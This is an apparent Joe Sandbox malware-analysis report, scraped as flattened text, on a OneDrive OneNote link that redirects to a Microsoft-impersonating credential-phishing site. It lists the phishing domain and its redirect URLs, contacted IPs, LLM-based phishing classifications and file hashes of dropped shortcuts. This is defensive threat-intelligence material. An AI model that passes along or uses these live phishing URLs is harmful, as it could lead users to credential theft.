    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    s-part-0044.t-0009.fb-t-msedge.net
    13.107.253.72
    truefalse
      unknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        unknown
        mohrhydrokultur.adaradocumentfolder.top
        104.21.45.155
        truetrue
          unknown
          s-part-0017.t-0009.fb-t-msedge.net
          13.107.253.45
          truefalse
            unknown
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              unknown
              wac-0003.wac-dc-msedge.net
              52.108.10.12
              truefalse
                unknown
                s-part-0039.t-0009.t-msedge.net
                13.107.246.67
                truefalse
                  unknown
                  1drv.ms
                  13.107.42.12
                  truefalse
                    unknown
                    s-part-0029.t-0009.t-msedge.net
                    13.107.246.57
                    truefalse
                      unknown
                      dual-spov-0006.spov-msedge.net
                      13.107.139.11
                      truefalse
                        unknown
                        wac-0003.wac-msedge.net
                        52.108.9.12
                        truefalse
                          unknown
                          bg.microsoft.map.fastly.net
                          199.232.214.172
                          truefalse
                            unknown
                            code.jquery.com
                            151.101.66.137
                            truefalse
                              unknown
                              sni1gl.wpc.upsiloncdn.net
                              152.199.21.175
                              truefalse
                                unknown
                                challenges.cloudflare.com
                                104.18.95.41
                                truefalse
                                  unknown
                                  www.google.com
                                  142.250.185.196
                                  truefalse
                                    unknown
                                    sni1gl.wpc.sigmacdn.net
                                    152.199.21.175
                                    truefalse
                                      unknown
                                      fa000000012.resources.office.net
                                      unknown
                                      unknownfalse
                                        unknown
                                        fa000000111.resources.office.net
                                        unknown
                                        unknownfalse
                                          unknown
                                          fa000000128.resources.office.net
                                          unknown
                                          unknownfalse
                                            unknown
                                            augloop.office.com
                                            unknown
                                            unknownfalse
                                              unknown
                                              ajax.aspnetcdn.com
                                              unknown
                                              unknownfalse
                                                unknown
                                                m365cdn.nel.measure.office.net
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  fa000000110.resources.office.net
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    onenoteonline.nel.measure.office.net
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      aadcdn.msauthimages.net
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        common.online.office.com
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          fa000000138.resources.office.net
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            onedrive.live.com
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              westeurope-pa00.augloop.office.com
                                                              unknown
                                                              unknownfalse
                                                                unknown
                                                                login.microsoftonline.com
                                                                unknown
                                                                unknownfalse
                                                                  unknown
                                                                  www.onenote.com
                                                                  unknown
                                                                  unknownfalse
                                                                    unknown
                                                                    spoprod-a.akamaihd.net
                                                                    unknown
                                                                    unknownfalse
                                                                      unknown
                                                                      messaging.engagement.office.com
                                                                      unknown
                                                                      unknownfalse
                                                                        unknown
                                                                        fa000000096.resources.office.net
                                                                        unknown
                                                                        unknownfalse
                                                                          unknown
                                                                          NameMaliciousAntivirus DetectionReputation
                                                                          https://mohrhydrokultur.adaradocumentfolder.top/false
                                                                            unknown
                                                                            https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdtrue
                                                                              unknown
                                                                              https://onedrive.live.com/view.aspx?resid=3E563D3FB2A98D1C!sa5e46869611b4483bcab4817eed24b41&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ5NGc_ZT1IUGpxVW4&wd=target%28Quick%20Notes.one%7C087bc1e6-1071-4924-97c8-9c06613cae25%2FMohr%20HYDROKULTUR%7Ca61e7bae-8de5-48ea-9575-302832b9824d%2F%29&wdorigin=NavigationUrlfalse
                                                                                unknown
                                                                                https://onedrive.live.com/personal/3e563d3fb2a98d1c/_layouts/15/Doc.aspx?sourcedoc=%7Ba5e46869-611b-4483-bcab-4817eed24b41%7D&action=default&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ5NGc_ZT1IUGpxVW4&slrid=ba095da1-10b3-a000-2020-f8c86b0ebf8e&originalPath=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ5NGc_cnRpbWU9QmY3LXdDVDAzRWc&CID=41ae2d81-d6a2-4d5a-bc24-bef3a325b0a4&_SRM=0:G:39true
                                                                                  unknown
                                                                                  https://mohrhydrokultur.adaradocumentfolder.top/&step=f253efe302d32ab264a76e0ce65be769671a397785458verify&uid=671a39778547atrue
                                                                                    unknown
                                                                                    https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98true
                                                                                      unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      13.107.6.156
                                                                                      unknownUnited States
                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      13.107.246.45
                                                                                      s-part-0017.t-0009.t-msedge.netUnited States
                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      52.108.9.12
                                                                                      wac-0003.wac-msedge.netUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      151.101.130.137
                                                                                      unknownUnited States
                                                                                      54113FASTLYUSfalse
                                                                                      52.108.10.12
                                                                                      wac-0003.wac-dc-msedge.netUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      52.109.89.117
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      151.101.66.137
                                                                                      code.jquery.comUnited States
                                                                                      54113FASTLYUSfalse
                                                                                      35.190.80.1
                                                                                      a.nel.cloudflare.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      23.38.98.97
                                                                                      unknownUnited States
                                                                                      16625AKAMAI-ASUSfalse
                                                                                      23.38.98.96
                                                                                      unknownUnited States
                                                                                      16625AKAMAI-ASUSfalse
                                                                                      13.107.139.11
                                                                                      dual-spov-0006.spov-msedge.netUnited States
                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      1.1.1.1
                                                                                      unknownAustralia
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      104.18.95.41
                                                                                      challenges.cloudflare.comUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      52.111.236.4
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      142.250.185.238
                                                                                      unknownUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      20.190.159.75
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      13.107.42.12
                                                                                      1drv.msUnited States
                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      13.107.253.72
                                                                                      s-part-0044.t-0009.fb-t-msedge.netUnited States
                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      40.126.31.73
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      239.255.255.250
                                                                                      unknownReserved
                                                                                      unknownunknownfalse
                                                                                      142.250.185.196
                                                                                      www.google.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      152.199.21.175
                                                                                      sni1gl.wpc.upsiloncdn.netUnited States
                                                                                      15133EDGECASTUSfalse
                                                                                      52.111.243.13
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      172.67.216.102
                                                                                      unknownUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      184.28.90.96
                                                                                      unknownUnited States
                                                                                      16625AKAMAI-ASUSfalse
                                                                                      152.199.19.160
                                                                                      unknownUnited States
                                                                                      15133EDGECASTUSfalse
                                                                                      216.58.206.74
                                                                                      unknownUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      40.126.32.140
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      23.38.98.102
                                                                                      unknownUnited States
                                                                                      16625AKAMAI-ASUSfalse
                                                                                      13.107.246.67
                                                                                      s-part-0039.t-0009.t-msedge.netUnited States
                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      142.250.186.174
                                                                                      unknownUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      23.38.98.104
                                                                                      unknownUnited States
                                                                                      16625AKAMAI-ASUSfalse
                                                                                      104.18.94.41
                                                                                      unknownUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      52.111.236.17
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      172.217.23.106
                                                                                      unknownUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      52.182.143.211
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      64.233.166.84
                                                                                      unknownUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      2.16.164.49
                                                                                      unknownEuropean Union
                                                                                      20940AKAMAI-ASN1EUfalse
                                                                                      2.19.126.143
                                                                                      unknownEuropean Union
                                                                                      16625AKAMAI-ASUSfalse
                                                                                      20.42.73.28
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      142.250.186.132
                                                                                      unknownUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      104.102.55.235
                                                                                      unknownUnited States
                                                                                      16625AKAMAI-ASUSfalse
                                                                                      23.38.98.111
                                                                                      unknownUnited States
                                                                                      16625AKAMAI-ASUSfalse
                                                                                      104.208.16.95
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      52.113.194.132
                                                                                      unknownUnited States
                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      13.107.246.57
                                                                                      s-part-0029.t-0009.t-msedge.netUnited States
                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      104.21.45.155
                                                                                      mohrhydrokultur.adaradocumentfolder.topUnited States
                                                                                      13335CLOUDFLARENETUStrue
                                                                                      142.250.186.163
                                                                                      unknownUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      216.58.206.67
                                                                                      unknownUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      13.107.253.45
                                                                                      s-part-0017.t-0009.fb-t-msedge.netUnited States
                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      20.42.65.94
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      2.16.168.12
                                                                                      unknownEuropean Union
                                                                                      20940AKAMAI-ASN1EUfalse
                                                                                      52.108.8.12
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      52.108.11.12
                                                                                      unknownUnited States
                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                      184.28.89.164
                                                                                      unknownUnited States
                                                                                      16625AKAMAI-ASUSfalse
                                                                                      88.221.110.248
                                                                                      unknownEuropean Union
                                                                                      20940AKAMAI-ASN1EUfalse
                                                                                      IP
                                                                                      192.168.2.7
                                                                                      192.168.2.4
                                                                                      192.168.2.6
                                                                                      192.168.2.5
                                                                                      192.168.2.17
                                                                                      192.168.2.10
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1541149
                                                                                      Start date and time:2024-10-24 14:09:03 +02:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                      Sample URL:https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUn
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:20
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • EGA enabled
                                                                                      Analysis Mode:stream
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal72.phis.troj.win@26/145@97/505
                                                                                      • Exclude process from analysis (whitelisted): SIHClient.exe, TextInputHost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.186.174, 64.233.166.84, 34.104.35.123, 23.38.98.104, 23.38.98.98, 23.38.98.96, 23.38.98.84, 23.38.98.102, 23.38.98.87, 104.102.55.235
                                                                                      • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, onenote.officeapps.live.com, usc-onenote.officeapps.live.com, accounts.google.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, c1-wildcard.cdn.office.net-c.edgekey.net.globalredir.akadns.net, e40491.dscd.akamaiedge.net, c1-wildcard.cdn.office.net-c.edgekey.net, clientservices.googleapis.com, res-1.cdn.office.net, e19254.dscg.akamaiedge.net, common-geo.wac.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, c1-onenote-15.cdn.office.net, clients2.google.com, edgedl.me.gvt1.com, euc-onenote-geo.wac.trafficmanager.net, onenote-geo.wac.trafficmanager.net, clients.l.google.com, res-1.cdn.office.net-c.edgekey.net, res-1.cdn.office.net-c.edgekey.net.globalredir.akadns.net, euc-onenote.officeapps.live.com, usc-onenote-geo.wac.trafficmanager.net
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • VT rate limit hit for: https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUn
                                                                                      InputOutput
                                                                                      URL: https://onedrive.live.com/personal/3e563d3fb2a98d1c/_layouts/15/Doc.aspx?sourcedoc=%7Ba5e46869-611b-4483-bcab-4817eed24b41%7D&action=default&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ Model: claude-3-haiku-20240307
                                                                                      ```json
                                                                                      {
                                                                                        "contains_trigger_text": true,
                                                                                        "trigger_text": "FREIGEGBENES DOKUMENT ANZEIGEN",
                                                                                        "prominent_button_name": "FREIGEGBENES DOKUMENT ANZEIGEN",
                                                                                        "text_input_field_labels": "unknown",
                                                                                        "pdf_icon_visible": false,
                                                                                        "has_visible_captcha": false,
                                                                                        "has_urgent_text": false,
                                                                                        "has_visible_qrcode": false
                                                                                      }
                                                                                      URL: https://onedrive.live.com/personal/3e563d3fb2a98d1c/_layouts/15/Doc.aspx?sourcedoc=%7Ba5e46869-611b-4483-bcab-4817eed24b41%7D&action=default&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ Model: claude-3-haiku-20240307
                                                                                      ```json
                                                                                      {
                                                                                        "brands": [
                                                                                          "Mohr HYDROKULTUR"
                                                                                        ]
                                                                                      }
                                                                                      URL: https://mohrhydrokultur.adaradocumentfolder.top/ Model: claude-3-haiku-20240307
                                                                                      ```json
                                                                                      {
                                                                                        "contains_trigger_text": true,
                                                                                        "trigger_text": "Verifying...",
                                                                                        "prominent_button_name": "unknown",
                                                                                        "text_input_field_labels": "unknown",
                                                                                        "pdf_icon_visible": false,
                                                                                        "has_visible_captcha": false,
                                                                                        "has_urgent_text": false,
                                                                                        "has_visible_qrcode": false
                                                                                      }
                                                                                      URL: https://mohrhydrokultur.adaradocumentfolder.top/ Model: claude-3-haiku-20240307
                                                                                      ```json
                                                                                      {
                                                                                        "brands": [
                                                                                          "Cloudflare"
                                                                                        ]
                                                                                      }
                                                                                      URL: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98 Model: claude-3-haiku-20240307
                                                                                      ```json
                                                                                      {
                                                                                        "contains_trigger_text": true,
                                                                                        "trigger_text": "Sign in",
                                                                                        "prominent_button_name": "Next",
                                                                                        "text_input_field_labels": [
                                                                                          "Email or phone"
                                                                                        ],
                                                                                        "pdf_icon_visible": false,
                                                                                        "has_visible_captcha": false,
                                                                                        "has_urgent_text": false,
                                                                                        "has_visible_qrcode": false
                                                                                      }
                                                                                      URL: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98 Model: claude-3-haiku-20240307
                                                                                      ```json
                                                                                      {
                                                                                        "brands": [
                                                                                          "Microsoft"
                                                                                        ]
                                                                                      }
                                                                                      URL: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98 Model: gpt-4o
                                                                                      ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.",    "The URL 'mohrhydrokultur.adaradocumentfolder.top' does not match the legitimate domain for Microsoft.",    "The domain 'adaradocumentfolder.top' is unusual and not associated with Microsoft.",    "The presence of unrelated words like 'mohrhydrokultur' and 'adaradocumentfolder' in the URL is suspicious.",    "The use of a '.top' domain extension is uncommon for a well-known brand like Microsoft and can be a red flag for phishing."  ],  "riskscore": 9}
                                                                                      Google indexed: False
                                                                                      URL: mohrhydrokultur.adaradocumentfolder.top
                                                                                                  Brands: Microsoft
                                                                                                  Input Fields: Email or phone
                                                                                      URL: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bd Model: claude-3-haiku-20240307
                                                                                      ```json
                                                                                      {
                                                                                        "contains_trigger_text": true,
                                                                                        "trigger_text": "Sign in to continue",
                                                                                        "prominent_button_name": "Sign in",
                                                                                        "text_input_field_labels": [
                                                                                          "Password"
                                                                                        ],
                                                                                        "pdf_icon_visible": false,
                                                                                        "has_visible_captcha": false,
                                                                                        "has_urgent_text": false,
                                                                                        "has_visible_qrcode": false
                                                                                      }
                                                                                      URL: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bd Model: claude-3-haiku-20240307
                                                                                      ```json
                                                                                      {
                                                                                        "brands": [
                                                                                          "Microsoft"
                                                                                        ]
                                                                                      }
                                                                                      URL: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bd Model: gpt-4o
                                                                                      ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is a well-known global technology company.",    "The legitimate domain for Microsoft is 'microsoft.com'.",    "The provided URL 'mohrhydrokultur.adaradocumentfolder.top' does not match the legitimate domain for Microsoft.",    "The URL contains unusual elements such as 'adaradocumentfolder.top', which is not associated with Microsoft.",    "The presence of a password input field on a non-Microsoft domain is suspicious and indicative of phishing."  ],  "riskscore": 9}
                                                                                      Google indexed: False
                                                                                      URL: mohrhydrokultur.adaradocumentfolder.top
                                                                                                  Brands: Microsoft
                                                                                                  Input Fields: Password
                                                                                      URL: https://mohrhydrokultur.adaradocumentfolder.top/&step=f253efe302d32ab264a76e0ce65be769671a397785458verify&uid=671a39778547a Model: claude-3-haiku-20240307
                                                                                      ```json
                                                                                      {
                                                                                        "contains_trigger_text": true,
                                                                                        "trigger_text": "Verify your identity",
                                                                                        "prominent_button_name": "Cancel",
                                                                                        "text_input_field_labels": "unknown",
                                                                                        "pdf_icon_visible": false,
                                                                                        "has_visible_captcha": false,
                                                                                        "has_urgent_text": false,
                                                                                        "has_visible_qrcode": false
                                                                                      }
                                                                                      URL: https://mohrhydrokultur.adaradocumentfolder.top/&step=f253efe302d32ab264a76e0ce65be769671a397785458verify&uid=671a39778547a Model: claude-3-haiku-20240307
                                                                                      ```json
                                                                                      {
                                                                                        "brands": [
                                                                                          "Microsoft"
                                                                                        ]
                                                                                      }
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 11:09:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2677
                                                                                      Entropy (8bit):3.9883893798240804
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:6173022101C452E29CB8E58C35688CA8
                                                                                      SHA1:93C49259A88968B7D1B5BC26BD4FFDF0CBB6722C
                                                                                      SHA-256:DF2A754C40F34FF62139FE28ADEEED7FF6EE6993025FCAF0D64ABD8BCB6242E4
                                                                                      SHA-512:607D4F7A928DD81BCA6DDC703A501DAE43C00C735F0FB08D336F8BCA69562955870E48B22838092F2DED40044D1C390D6440F70F07FC8519F83CD9345D735F2B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:L..................F.@.. ...$+.,........&......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IXY)a....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY5a....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VXY5a....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VXY5a...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VXY7a...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 11:09:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2679
                                                                                      Entropy (8bit):4.004534829387322
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:435A16CC83EC13158A4165DD9FC42651
                                                                                      SHA1:ECE011ED57CB285F11AC152019B406D7EF93239E
                                                                                      SHA-256:7B5FE2730ED7839B700C6157F91EF3C2A41186D444B861333FC8A62CD17095E2
                                                                                      SHA-512:65CF93CD7B9CA780AE4D970BE9F35D2C6FCB000F249E14318D5C6D5CA1081F74D10301F23F3877BA6D0AD60602997EF1CB6EA370D86B32FD22BE65744959B52A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:L..................F.@.. ...$+.,....u...&......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IXY)a....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY5a....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VXY5a....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VXY5a...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VXY7a...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2693
                                                                                      Entropy (8bit):4.012526462926107
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:5131600F1D49F2AC14F9DE734F5DBF13
                                                                                      SHA1:6384C403495630D154FF833549848273BEEFACD2
                                                                                      SHA-256:02234BA8D47FD0228C014A8EB38AD805A83C5BEF403A3CBEFC2BB522B91CEA95
                                                                                      SHA-512:01EC3DD2819FA79D2163C1775751CFE04D405004D83668A6786A70B394E2A1C8FEAD250CDC8957EE6DAD8888C871BE9BE47BDBAC781CEC3FF220195772187F6A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IXY)a....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY5a....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VXY5a....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VXY5a...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 11:09:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2681
                                                                                      Entropy (8bit):4.002399892201546
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:512036C5245E0E6A6777184BD02B7032
                                                                                      SHA1:F8AD26FB097855073D124450F3C5610BF1CB0D34
                                                                                      SHA-256:EF219EFA9EFE6F7594759EE77304B08CBD4652020354C90232F47A17DE603161
                                                                                      SHA-512:A5A74D273DF4F74A1A5E021AC95D01220C1EFB4D385A0F4703E0E302A32434FE627619127E1F477A7EEB186D82D7C1414AB65E9D78792C352D32245F2967463B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
